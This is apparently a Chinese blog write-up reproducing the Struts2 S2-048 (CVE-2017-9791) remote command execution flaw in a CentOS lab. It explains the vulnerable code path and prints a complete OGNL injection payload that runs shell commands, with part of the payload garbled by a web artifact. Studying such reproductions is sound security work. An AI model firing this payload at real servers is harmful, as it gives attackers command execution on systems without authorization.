入坑centos筆記（二）

搭建centos服務器環境事實上是爲了復現CVE-2017-9791  Struts(S2-048遠程命令執行漏洞)

一、   漏洞分析

原理：在Struts2.3.x 系列的Showcase應用中演示Struts2整合Struts1的插件中存在一處任意代碼執行漏洞。當應用使用了Struts2 Struts1的插件時，可能導致不受信任的輸入傳入到ActionMessage類中導致命令執行。

具體分析（以struts2.3.24版本爲例）：

漏洞觸發位置在SaveGangsterAction.java中，

在struts2中開啓了struts1的插件，org.apache.struts2.s1.Struts1Action類是把封裝了struts1的Action 以便兼容在struts2中。

首先這裏ActionForwardforward = action.execute(mapping, actionForm, request, response);會把表單的請求處理回顯給客戶端。

然後addActionMessage(getText(msg.getKey(),Arrays.asList(msg.getValues())));這裏又調用了getText方法會把action messages傳遞給com.opensymphony.xwork2.util.LocalizedTextUtil.getDefaultMessage。

最後在其中又調用了com.opensymphony.xwork2.util.TextParseUtil.translateVariables,它用來調用OGNL 表達式用處理字符串表達式。漏洞利用OGNL表達式執行任意命令。

二、   實驗環境

1.  靶機：centOS 7.3 ：https://www.centos.org/download/

2.  攻擊機： Windows10 64-bit

 

三、   實驗結果

//實驗操作的完整步驟

首先搭建實驗環境，這裏使用的靶機環境爲centOS 7.3 64-bit

 

在對應網站下載受影響的struts2版本具體影響範圍爲struts2.3.*

這裏使用了struts2.3.24進行漏洞復現

將struts2-showcase.war放到tomcat/webapps目錄下，首先進行本地測試服務是否完好

服務器靶機:curl 127.0.0.1:8080\

發現有response說明服務完好。查詢本機ip地址爲192.168.36.128

那麼在攻擊機上進行基本訪問

這裏UA使用firefox，url：http://192.168.36.128:8080/struts2-showcase/integration/editGangster.action

 

 

驗證漏洞：在Gangster Name中提交${1+1}發現最終1+1被執行

說明漏洞存在

於是構造payload：name=${(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd="ifconfig").(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=newjava.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}&age=111&__checkbox_bustedBefore=true&description=

其中加粗的地方爲可執行的命令

這裏面遇到一個坑，調了很久不知道哪裏出了問題。。就是我在直接提交payload的時候發現返回name字段不能爲空，加一個回車換行就可以，具體在驗證腳本中有寫到。

Burpsuite抓包修改重放可以看到

成功執行了ifconfig命令

於是寫腳本驗證，腳本主體如下：

由於需要換行（最後還是不知道爲什麼）於是在藍色箭頭處手動添加換行符。

 

 

執行腳本

服務器端信息：

至此、漏洞驗證過程完畢